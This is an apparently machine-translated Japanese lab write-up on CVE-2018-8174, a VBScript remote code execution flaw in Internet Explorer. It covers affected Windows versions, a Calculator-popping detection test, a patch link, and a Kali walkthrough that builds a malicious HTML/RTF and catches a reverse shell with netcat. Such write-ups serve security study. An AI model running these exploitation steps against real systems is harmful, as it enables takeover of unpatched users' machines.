脆弱性の説明
VBScriptエンジンがメモリ内のオブジェクトを処理する方法に、リモートでコードが実行される脆弱性が存在します。この脆弱性は、攻撃者が現在のユーザーのコンテキストで任意のコードを実行できるようにメモリを破壊する可能性があります。この脆弱性の悪用に成功した攻撃者は、現在のユーザーと同じユーザー権限を取得する可能性があります。現在のユーザーが管理ユーザー権限でログインした場合、この脆弱性を悪用した攻撃者が影響を受けるシステムを制御する可能性があります。次に、攻撃者がプログラムをインストールする可能性があります。データを表示、変更、または削除するか、完全なユーザー権限で新しいアカウントを作成します。
Webベースの攻撃シナリオでは、攻撃者はInternet Explorerを介してこの脆弱性を悪用するように設計された特別に細工されたWebサイトを持っており、ユーザーをだましてWebサイトを表示させる可能性があります。攻撃者は、IEレンダリングエンジンをホストするアプリケーションまたはMicrosoftOfficeドキュメントに「初期化セーフ」とマークされたActiveXコントロールを埋め込む可能性もあります。攻撃者は、感染したWebサイトや、ユーザーが提供したコンテンツや広告を受け入れたりホストしたりするWebサイトを使用する可能性もあります。これらのWebサイトには、この脆弱性を悪用する可能性のある特別に細工されたコンテンツが含まれている可能性があります。
インパクトバージョン
- Windows 7
- Windows Server 2012 R2
- Windows RT 8.1
- Windows Server 2008
- Windows Server 2012
- Windows 8.1
- Windows Server 2016
- Windows Server 2008 R2
- ウィンドウズ10
- Windows10サーバー。
脆弱性の検出
https://github.com/clark515/CVE_PoC/
ファイルをダウンロードした後、htmlファイルをWebサーバーまたはターゲットマシンにコピーします。
CVE-2018-8174の脆弱性があるシステムがIEを使用してhtmファイルにアクセスすると、計算機がポップアップ表示されます。
エクスプロイト
攻撃マシン:カリ
ターゲットマシン:Windows 7
スクリプトをkaliにダウンロードします
git clone https://github.com/Yt1g3r/CVE-2018-8174_EXP.git
ファイルを入力して、スクリプトだけを生成します。
cd CVE-2018-8174_EXP/
python CVE-2018-8174.py -u http://192.168.206.128/exploit.html -o exp.rtf -i 192.168.206.128 -p 4444
- -u:URLアドレス、悪意のあるhtmlファイル
- -o:ドキュメントを生成します
- -i:リスニングアドレス
- -p:リスニングポート
htmlファイルをWebサイトディレクトリにコピーします
cp exploit.html /var/www/html/
cp exp.rtf /var/www/html/
apache2サービスを開く
service apache2 start
ポートモニタリングにncを使用する
nc -lvvp 4444
ターゲットがieブラウザを使用して作成したhtmlファイルにアクセスすると、シェル権限を取得できます
http://192.168.206.128/exploit.html
オンラインでの攻撃マシンのnc監視:
バグ修正
パッチアドレス:https:
//portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8174
対応するシステムバージョンを選択します。たとえば、私は32ビットのWindows7システムです。
ダウンロード後すぐに実行
参照アドレス
https://www.freebuf.com/vuls/224379.html